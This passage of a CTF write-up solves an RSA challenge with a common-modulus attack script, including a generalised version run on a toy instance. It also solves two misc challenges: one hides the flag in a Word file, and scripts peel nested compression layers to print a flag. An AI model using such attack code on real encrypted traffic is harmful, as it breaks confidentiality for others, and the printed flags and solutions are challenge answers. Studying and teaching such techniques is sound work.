c3 = 14065425026445215199826296511184881258323064633386950509660192854866326626040354040592178906620984652169865998063876885421774133239148395916412178848784041317916589243316140373118461629430419305769180856968279675982734449182890302977853892881391084830333333875116598959777525928574769839174695101654696531535920235825780434207646161363349309470260223615977113109458426965856166705879375711518022880712089324008258280991081209228374850515248942548172463741894540420262751207821783524890116559086561517224038086473047623408064157594299815732082781632190258405091440187576055868450259807171733509904666142689629066721239
g12, x1, x2 = gcdext(e1, e2)        # x1*e1 + x2*e2 = g12
g, t1, x3 = gcdext(g12, e3)         # t1*g12 + x3*e3 = g
print(g)                            # must be 1 for the attack to work
# negative exponents are handled as modular inverses
m = int(pow(c1, x1 * t1, n) * pow(c2, x2 * t1, n) * pow(c3, x3, n) % n)
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))
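The three-exponent trick above generalises to any number of exponents: chaining extended Euclid across e1..ek yields coefficients u_i with sum(u_i * e_i) = gcd(e1, ..., ek), and when that gcd is 1 the product of c_i^u_i mod n is m. The following is an added example for this page, not the author's script: egcd, common_modulus_attack and toy_instance are this example's own names, and the toy RSA instance (n = 61 * 53) is constructed here so the code runs without the challenge's 2048-bit values; passing n and [(e1, c1), (e2, c2), (e3, c3)] from the script above applies it to the real data.

```python
def egcd(a: int, b: int):
    """Extended Euclid: returns (g, s, t) with s*a + t*b == g == gcd(a, b)."""
    s0, s1, t0, t1 = 1, 0, 0, 1
    while b:
        q, a, b = a // b, b, a % b
        s0, s1 = s1, s0 - q * s1
        t0, t1 = t1, t0 - q * t1
    return a, s0, t0


def common_modulus_attack(n: int, pairs) -> int:
    """pairs = [(e_i, c_i), ...]: the same m encrypted under one modulus n and several exponents.

    Bezout coefficients are folded across all exponents so that sum(u_i * e_i) == gcd(e_1..e_k).
    With gcd 1, prod(c_i ** u_i) == m ** (sum u_i e_i) == m (mod n); negative u_i turn into
    modular inverses, which needs gcd(c_i, n) == 1 (true unless c_i shares a factor with n).
    """
    g, coeffs = pairs[0][0], [1]
    for e_i, _ in pairs[1:]:
        g, s, t = egcd(g, e_i)                 # s * (running combination) + t * e_i == new g
        coeffs = [u * s for u in coeffs] + [t]
    if g != 1:
        raise ValueError(f"exponents share the common factor {g}; the attack does not apply")
    m = 1
    for (_, c_i), u in zip(pairs, coeffs):
        m = m * pow(c_i, u, n) % n             # pow with a negative exponent: Python >= 3.8
    return m


def long_to_bytes(m: int) -> bytes:
    return m.to_bytes((m.bit_length() + 7) // 8, "big")


def toy_instance(m: int = 0x2A, exponents=(17, 7, 11)):
    """Constructed RSA instance (n = 61 * 53) for exercising the attack on a known plaintext."""
    n = 61 * 53
    return n, [(e, pow(m, e, n)) for e in exponents]


if __name__ == "__main__":
    n, pairs = toy_instance()
    print(hex(common_modulus_attack(n, pairs)))      # 0x2a
```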

misc

隐秘的角落

  • Approach

The Word document looks normal and is full of fake flags. Open it as a zip: the real flag is in word/header3.xml.

神秘的压缩包

  • Approach

A loop that peels off one compression layer per iteration; the scripts below are variants that need adapting to the layers actually present.

exp1
import bz2
import gzip
import lzma
import pathlib

import py7zr
import zstandard

count = 1
extra_outputfile = "compress/flag" + str(count)
outputfile = "compress/flag" + str(count + 1)


def decompress_lzma_to_folder(input_file):
    # lzma.open handles both .xz (FD 37 7A 58) and raw .lzma (5D 00 00 80) containers
    with open(outputfile, 'wb') as f:
        print("lzma:" + outputfile)
        f.write(lzma.open(input_file).read())


def decompress_zstandard_to_folder(input_file):
    input_file = pathlib.Path(input_file)
    with open(input_file, 'rb') as compressed:
        decomp = zstandard.ZstdDecompressor()
        print("zst:" + outputfile)
        with open(outputfile, 'wb') as destination:
            decomp.copy_stream(compressed, destination)


def decompress_gzip_to_folder(input_file):
    with gzip.open(input_file, 'rb') as f_in:
        with open(outputfile, 'wb') as f:
            print("gzip:" + outputfile)
            f.write(f_in.read())


def decompress_bzip_to_folder(input_file):
    with open(input_file, 'rb') as f_in:
        with open(outputfile, 'wb') as f:
            print("bzip:" + outputfile)
            f.write(bz2.decompress(f_in.read()))


def decompress_7zip_to_folder(input_file):
    # a 7z archive holds named members, so extract into a directory named after outputfile;
    # the loop then has to be pointed at the extracted member
    print("7zip:" + outputfile)
    with py7zr.SevenZipFile(input_file, mode='r') as z:
        z.extractall(outputfile)


while True:
    with open(extra_outputfile, 'rb') as f:
        data = f.read()
    print(data[0:4])
    if data[0:4] == b"(\xb5/\xfd":               # zstd magic 28 B5 2F FD
        decompress_zstandard_to_folder(extra_outputfile)
    elif data[0:2] == b'\x1f\x8b':                # gzip magic; bytes 3-4 vary with method/flags
        decompress_gzip_to_folder(extra_outputfile)
    elif data[0:4] == b'\xfd7zX' or data[0:4] == b']\x00\x00\x80':
        decompress_lzma_to_folder(extra_outputfile)
    elif data[0:3] == b'BZh':                     # bzip2: 'BZh' followed by the block-size digit
        decompress_bzip_to_folder(extra_outputfile)
    elif data[0:4] == b'\x37\x7a\xbc\xaf':
        decompress_7zip_to_folder(extra_outputfile)
    else:
        break                                     # no known container left: this is the payload
    extra_outputfile = outputfile
    print("extra:" + extra_outputfile)
    count = count + 1
    outputfile = "compress/flag" + str(count + 1)
    print("now:" + outputfile)

# ACTF{r0cK_4Nd_rolL_1n_C0mpr33s1ng_aNd_uNCOmrEs5iNg}
exp2
import os
import subprocess

input_file = 'flag'


def get_compressed_type(filepath: str) -> str:
    # let the `file` command identify the outer container
    file_cmd_output = subprocess.run(['file', filepath], stdout=subprocess.PIPE).stdout.decode().strip()
    if 'gzip compressed data' in file_cmd_output:
        return 'gzip'
    if 'XZ compressed data' in file_cmd_output:
        return 'xz'
    if 'bzip2 compressed data' in file_cmd_output:
        return 'bzip2'
    if 'LZMA compressed data' in file_cmd_output:
        return 'lzma'
    if 'Zstandard compressed data' in file_cmd_output:
        return 'zstd'
    return ''


while True:
    ctype = get_compressed_type(input_file)
    if ctype == "gzip":
        tmp_file = input_file + ".gz"
        cmd = "mv {} {}; gunzip {}".format(input_file, tmp_file, tmp_file)
    elif ctype == "xz":
        tmp_file = input_file + ".xz"
        cmd = "mv {} {}; unxz {}".format(input_file, tmp_file, tmp_file)
    elif ctype == "bzip2":
        tmp_file = input_file + ".bz2"
        cmd = "mv {} {}; bunzip2 {}".format(input_file, tmp_file, tmp_file)
    elif ctype == "lzma":
        tmp_file = input_file + ".lzma"
        cmd = "mv {} {}; unlzma {}".format(input_file, tmp_file, tmp_file)
    elif ctype == "zstd":
        tmp_file = input_file + ".zst"
        cmd = "mv {} {}; unzstd --force {}".format(input_file, tmp_file, tmp_file)
    else:
        print("done")
        break
    os.system(cmd)          # each tool removes its input and writes back a file named "flag"
exp3
import os
import random

# the challenge generator: 16 random compression layers applied to the file "flag"
input_file = 'flag'
random_list = [
    'gzip',
    'xz',
    'bzip2',
    'lzma',
    'zstd'
]

random_choices = []
for i in range(16):
    random_choices.append(random.randint(0, len(random_list) - 1))

for choice in random_choices:
    if choice == 0:
        # gzip
        out_file = 'flag.gz'
        cmd = 'gzip flag'

    if choice == 1:
        # xz
        out_file = 'flag.xz'
        cmd = 'xz flag'

    if choice == 2:
        # bzip2
        out_file = 'flag.bz2'
        cmd = 'bzip2 flag'

    if choice == 3:
        # lzma
        out_file = 'flag.lzma'
        cmd = 'lzma flag'

    if choice == 4:
        # zstd
        out_file = 'flag.zst'
        cmd = 'zstd -f flag'

    os.system(cmd)
    os.system('mv {} {}'.format(out_file, input_file))

print("done")
print("choices:", random_choices)
# choices: [2, 3, 3, 3, 1, 2, 1, 1, 1, 2, 0, 1, 2, 3, 3, 4]
exp4
import os

index = 750
while True:
    # each round extracts the newest file of folder index-1 into folder index with 7-Zip
    newfile = os.listdir(f"D:\\aaa\\202209\\1\\{index-1}")[-1]
    ret = os.system(f"\"D:\\Program Files\\7-Zip\\7z.exe\" x D:\\aaa\\202209\\1\\{index-1}\\{newfile} -oD:\\aaa\\202209\\1\\{index} -aoa")
    if ret != 0:        # 7-Zip could not open it: the innermost file has been reached
        break
    index += 1
exp5
import bz2
import gzip
import lzma
import zipfile

import filetype

while True:
    kind = filetype.guess("new")
    if kind is None:                 # no known container signature left: "new" is the final payload
        break
    print(kind.extension)

    if kind.extension == "bz2":
        with bz2.BZ2File("new") as bz2file:      # open the file
            data = bz2file.read()                # get the decompressed data
        with open("new", 'wb') as out:
            out.write(data)                      # overwrite with the uncompressed layer
    elif kind.extension == "gz":
        with gzip.GzipFile("new", 'rb') as inp:
            s = inp.read()
        with open("new", 'wb') as output:
            output.write(s)
    elif kind.extension == "zip":
        with zipfile.ZipFile("new", 'r') as zf:
            zf.extractall(".")
        with open("flag", "rb") as member:       # the archive member is named flag
            f = member.read()
        with open("new", "wb") as out:
            out.write(f)
    elif kind.extension == "xz":
        with lzma.open("new", 'rb') as inp:
            f = inp.read()
        with open("new", "wb") as out:
            out.write(f)
    else:
        break                        # a container type this script does not handle